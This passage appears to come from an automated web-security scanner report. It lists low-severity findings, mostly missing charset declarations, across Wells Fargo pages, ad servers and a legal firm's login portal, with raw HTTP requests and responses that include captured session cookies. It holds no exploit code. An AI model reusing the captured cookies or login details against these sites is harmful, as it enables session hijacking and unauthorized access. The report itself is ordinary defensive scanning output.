Server: IBM_HTTP_Server
Env: DCITC
Last-Modified: Wed, 19 Apr 2006 15:05:12 GMT
ETag: "15002c-876-fb79ba00"
Accept-Ranges: bytes
Content-Length: 2166
Content-Type: text/plain
Cache-Control: max-age=73169
Expires: Fri, 13 May 2011 07:43:50 GMT
Date: Thu, 12 May 2011 11:24:21 GMT
Connection: keep-alive

...... ..........&...........h.......(... ...@............................................................................................................................!....33.33.2!31"3....0.2..133
...[SNIP]...

26.20. https://www.wellsfargo.com/jump/theprivatebank/index

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /jump/theprivatebank/index

Request

GET /jump/theprivatebank/index HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 12 May 2011 11:07:47 GMT
Content-length: 8767
Content-type: text/html; charset=ISO-8859-1
Set-Cookie: v1st=860BCE3A6686392; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com
Set-Cookie: wcmcookiewf=2YvRNL1DhnQJXpvqtrRMH62pV5nkJ3W9wswYr5TSXhRqMGc2yXqQ!-1621466656; domain=.wellsfargo.com; path=/; secure
Set-Cookie: wfacookie=B-20110512040747952746006; domain=.wellsfargo.com; expires=Sunday, 09-May-2021 11:07:47 GMT; path=/
Content-Language: en-US
Set-Cookie: ISD_WCM_COOKIE=876747786.16927.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/javasc
...[SNIP]...

26.21. https://www.wellsfargo.com/pi_action/thePrivateBankFormAction

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /pi_action/thePrivateBankFormAction

Request

POST /pi_action/thePrivateBankFormAction HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/theprivatebank/contact_us
Cache-Control: max-age=0
Origin: https://www.wellsfargo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=5FAD486523BA40FE; wcmcookiewf=q39sNL1C21cRpNPhyX176LS1LfV5GQpFwBBZ1zG9LhXy0G6bDGLV!-1927433398; wfacookie=B-20110512040746277056405; ISD_WCM_COOKIE=859970570.16927.0000
Content-Length: 211

firstName=&lastName=&city=&state=&zip=&phoneAreaCode=&phoneMidPart=&phoneLastPart=&bestTimeToCall=No+Preference&email=&currentLocation=&campaignId=CMP000038&waveId=WAV000376&lobId=WMG&leadFormId=TPB+M
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 12 May 2011 11:13:40 GMT
Content-length: 10633
Content-type: text/html; charset=UTF-8
Content-Language: en-US


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Contact_us - The Private Bank<
...[SNIP]...

26.22. https://www.wellsfargo.com/theprivatebank/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /theprivatebank/

Request

GET /theprivatebank/ HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=5FAD486523BA40FE; wcmcookiewf=q39sNL1C21cRpNPhyX176LS1LfV5GQpFwBBZ1zG9LhXy0G6bDGLV!-1927433398; wfacookie=B-20110512040746277056405; ISD_WCM_COOKIE=859970570.16927.0000

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 12 May 2011 11:09:16 GMT
Content-length: 11996
Content-type: text/html; charset=UTF-8
Content-Language: en-US


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>The Private Bank ... W
...[SNIP]...

26.23. https://www.wellsfargo.com/theprivatebank/contact_us

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /theprivatebank/contact_us

Request

GET /theprivatebank/contact_us HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/jump/theprivatebank/index
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=5FAD486523BA40FE; wcmcookiewf=q39sNL1C21cRpNPhyX176LS1LfV5GQpFwBBZ1zG9LhXy0G6bDGLV!-1927433398; wfacookie=B-20110512040746277056405; ISD_WCM_COOKIE=859970570.16927.0000

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 12 May 2011 11:09:15 GMT
Content-length: 9817
Content-type: text/html; charset=UTF-8
Content-Language: en-US


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Contact_us - The Private Bank<
...[SNIP]...

27. HTML does not specify charset
There are 42 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


27.1. http://ad-emea.doubleclick.net/adi/N568.273558.BLOOMBERG1/B3885816.3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N568.273558.BLOOMBERG1/B3885816.3

Request

GET /adi/N568.273558.BLOOMBERG1/B3885816.3;sz=88x31;click0=http://ads.bloomberg.com/RealMedia/ads/click_lx.ads/bloombergopt/news/sports/international/story/L44/2095024673/x81/Bloomberg/3848309/DowJones_DART_NewsTradebar_88x31.html/72634857383032345a51594144454b2b?;ord=2095024673? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 634
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 12 May 2011 11:37:31 GMT
Expires: Thu, 12 May 2011 11:37:31 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad-emea.doubleclick.net/click;h=v8/3b05/14/cd
...[SNIP]...

27.2. http://ad.amtk-media.com/iframe

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amtk-media.com
Path:   /iframe

Request

GET /iframe?spacedesc=2107089_1090554_728x90_1204852_2107089&target=_blank&@CPSC@= HTTP/1.1
Host: ad.amtk-media.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:12 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://ad.amtk-media.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=51-131422944; expires=Sat, 11 May 2013 23:37:12 GMT; path=/; domain=.amtk-media.com
Set-Cookie: CSList=1090498/1090554,0/0,0/0,0/0,0/0; expires=Wed, 10 Aug 2011 11:37:12 GMT; path=/; domain=.amtk-media.com
Content-Type: text/html
Content-Length: 4217
Connection: close


<SCRIPT LANGUAGE="JavaScript">

function Measure_this(EV)
{
var img = new Image();
img.src = "http://ad.amtk-media.com/image_htmlping?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1108111&t
...[SNIP]...

27.3. http://ads1.revenue.net/j

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads1.revenue.net
Path:   /j

Request

GET /j?site_id=12169&pplacement_id=1&r_num=58437537 HTTP/1.1
Host: ads1.revenue.net
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Train0=.CAB9sOjE6MToxMjE2OToyMjcyNDU6MzQ0MDo3MzQzODkxNDoxOjA6MTMwMzU3NzM4MjoxsAEEMzQxODI6LSkEAIwEmgJ8dnQEIAdOATE3dAVgDAIzNDExNylEAQktOjEzMDM1MzQxODIRAAA=

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:01:54 GMT
Server: Oversee Webserver v1.3.20
Vary: Accept-Encoding
Cache-control: private, no-cache, must-revalidate
Pragma: no-cache
P3P: policyref="/w3c/revenue.xml", CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Connection: close
O_CREATIVE_ID: 227245
Set-Cookie: Train0=.CAB92OjE6MToxMjE2OToyMjcyNDU6MzQ0MDo1ODQzNzUzNzoxOjA6MTMwNTI0NDkxNDoxsAEEMDE3MTQ6LSkEAAcxMzA1MjAxNzE0EQAA; path=/; domain=.revenue.net; expires=Fri, 10 Jun 2022 05:05:41 GMT
Content-Type: text/html
Content-Length: 331

document.write('<SCRIPT TYPE="text/javascript" SRC="http://panther1.cpxinteractive.com/mz/ds.js"></SCRIPT>');


document.write('<script language="JavaScript" src="http://ads1.revenue.net/load/2
...[SNIP]...

27.4. http://amch.questionmarket.com/adscgen/sta.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/sta.php

Request

GET /adscgen/sta.php?survey_num=909615&site=312253209&code=214693344 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1_200214693346-2-1; ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0_909615-)66)M-0

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:15:52 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a210.dl
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 168
Content-Type: text/html

(function(){
if(1!=4){
(new Image).src="http://amch.questionmarket.com/adsc/d909615/2/200214693344/decide.php?ord="+Math.floor((new Date()).getTime()/1000);


}
})();


27.5. https://ams-legal.net/support/Login.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ams-legal.net
Path:   /support/Login.asp

Request

GET /support/Login.asp HTTP/1.1
Host: ams-legal.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://ams-legal.net/support/default.asp
Cookie: ASPSESSIONIDACBSASQD=JACKKCLBCMGCKCLIKDFBNIEK; ASPSESSIONIDSQCDBTRB=FEGHIDNBDBEOJFOALCNPEOKK

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:32:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
cache-control: no-cache, no-store
Content-Length: 2955
Content-Type: text/html
Expires: Thu, 12 May 2011 12:32:28 GMT
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">
<html>
<head>
<title>AMS Legal Collaborator</title>
<link rel="stylesheet" type="text/css" href="Lo
...[SNIP]...

27.6. https://ams-legal.net/support/LoginProcess.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ams-legal.net
Path:   /support/LoginProcess.asp

Request

POST /support/LoginProcess.asp HTTP/1.1
Host: ams-legal.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://ams-legal.net/support/Login.asp
Cookie: ASPSESSIONIDACBSASQD=JACKKCLBCMGCKCLIKDFBNIEK; ASPSESSIONIDSQCDBTRB=FEGHIDNBDBEOJFOALCNPEOKK; ASPSESSIONIDQSCDBTRB=HJGHIDNBKFGLLIOHFCIEAMGP
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

newPassword=True&userid=&email=

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:32:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
cache-control: no-cache, no-store
Content-Length: 162
Content-Type: text/html
Expires: Thu, 12 May 2011 12:32:52 GMT
Cache-control: private


<script type="text/javascript">
parent.MainPnl.userFocus();
parent.MainPnl.sendMessage('Reset Password Error', 'Invalid User ID or Email address');
</script>

27.7. https://ams-legal.net/support/blank.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ams-legal.net
Path:   /support/blank.htm

Request

GET /support/blank.htm HTTP/1.1
Host: ams-legal.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://ams-legal.net/support/default.asp
Cookie: ASPSESSIONIDACBSASQD=JACKKCLBCMGCKCLIKDFBNIEK; ASPSESSIONIDSQCDBTRB=FEGHIDNBDBEOJFOALCNPEOKK

Response

HTTP/1.1 200 OK
Content-Length: 195
Content-Type: text/html
Last-Modified: Wed, 02 Feb 2011 22:12:40 GMT
Accept-Ranges: bytes
ETag: "07c4c4e26c3cb1:2d4e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:32:27 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">
<html>
<head>
<title>Blank Page</title>
</head>
<body>
<!-- Blank Page -->
</body>
</html>

27.8. https://ams-legal.net/support/default.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ams-legal.net
Path:   /support/default.asp

Request

GET /support/default.asp HTTP/1.1
Host: ams-legal.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ams-legal.com/services_and_support.asp
Cookie: ASPSESSIONIDACBSASQD=JACKKCLBCMGCKCLIKDFBNIEK; ASPSESSIONIDSQCDBTRB=FEGHIDNBDBEOJFOALCNPEOKK

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:32:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
cache-control: no-cache, no-store
Content-Length: 403
Content-Type: text/html
Expires: Thu, 12 May 2011 12:32:27 GMT
Set-Cookie: ASPSESSIONIDQSCDBTRB=GJGHIDNBJPFJKBPOAGHLPKEK; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <title>AMS Legal Collaborator</title>
</head>
<frameset rows="100%,0" border="0">
   <frame name="MainPnl" src="Logi
...[SNIP]...

27.9. https://ams-legal.net/tuckerellis/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ams-legal.net
Path:   /tuckerellis/

Request

GET /tuckerellis/ HTTP/1.1
Host: ams-legal.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 73
Content-Type: text/html
Content-Location: https://ams-legal.net/tuckerellis/Default.htm
Last-Modified: Mon, 18 Oct 2010 19:35:54 GMT
Accept-Ranges: bytes
ETag: "f43deadfb6ecb1:173e8"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:25:28 GMT

<html>
<meta http-equiv="REFRESH" CONTENT="0; URL=default.asp">
</html>

27.10. https://ams-legal.net/tuckerellis/Login.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ams-legal.net
Path:   /tuckerellis/Login.asp

Request

GET /tuckerellis/Login.asp HTTP/1.1
Host: ams-legal.net
Connection: keep-alive
Referer: https://ams-legal.net/tuckerellis/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQCDBTRB=PDGHIDNBEPFJCBKCFFIABLCC

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:25:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
cache-control: no-cache, no-store
Content-Length: 2815
Content-Type: text/html
Expires: Thu, 12 May 2011 12:25:32 GMT
Set-Cookie: ASPSESSIONIDACBSASQD=DACKKCLBEDJNFIFEHJMOIFOI; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">
<html>
<head>
<title>AMS Legal Collaborator</title>
<link rel="stylesheet" type="text/css" href="Lo
...[SNIP]...

27.11. https://ams-legal.net/tuckerellis/LoginProcess.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ams-legal.net
Path:   /tuckerellis/LoginProcess.asp

Request

POST /tuckerellis/LoginProcess.asp HTTP/1.1
Host: ams-legal.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://ams-legal.net/tuckerellis/Login.asp
Cookie: ASPSESSIONIDACBSASQD=JACKKCLBCMGCKCLIKDFBNIEK; ASPSESSIONIDSQCDBTRB=FEGHIDNBDBEOJFOALCNPEOKK
Content-Type: application/x-www-form-urlencoded
Content-Length: 35

newPassword=False&userid=&password=

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:32:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
cache-control: no-cache, no-store
Content-Length: 150
Content-Type: text/html
Expires: Thu, 12 May 2011 12:32:02 GMT
Cache-control: private


<script type="text/javascript">
parent.MainPnl.userFocus();
parent.MainPnl.sendMessage('Login Failed', 'Invalid User ID or Password.');
</script>

27.12. https://ams-legal.net/tuckerellis/blank.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ams-legal.net
Path:   /tuckerellis/blank.htm

Request

GET /tuckerellis/blank.htm HTTP/1.1
Host: ams-legal.net
Connection: keep-alive
Referer: https://ams-legal.net/tuckerellis/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQCDBTRB=PDGHIDNBEPFJCBKCFFIABLCC

Response

HTTP/1.1 200 OK
Content-Length: 195
Content-Type: text/html
Last-Modified: Mon, 18 Oct 2010 19:35:53 GMT
Accept-Ranges: bytes
ETag: "e5cea9adfb6ecb1:2d4e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:25:31 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">
<html>
<head>
<title>Blank Page</title>
</head>
<body>
<!-- Blank Page -->
</body>
</html>

27.13. https://ams-legal.net/tuckerellis/default.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ams-legal.net
Path:   /tuckerellis/default.asp

Request

GET /tuckerellis/default.asp HTTP/1.1
Host: ams-legal.net
Connection: keep-alive
Referer: https://ams-legal.net/tuckerellis/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:25:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
cache-control: no-cache, no-store
Content-Length: 403
Content-Type: text/html
Expires: Thu, 12 May 2011 12:25:30 GMT
Set-Cookie: ASPSESSIONIDSQCDBTRB=AEGHIDNBPNJAPLEFPMPOEJNA; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <title>AMS Legal Collaborator</title>
</head>
<frameset rows="100%,0" border="0">
   <frame name="MainPnl" src="Logi
...[SNIP]...

27.14. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2391347&PluID=0&w=728&h=90&ord=2011.05.12.11.02.51&ucm=true HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
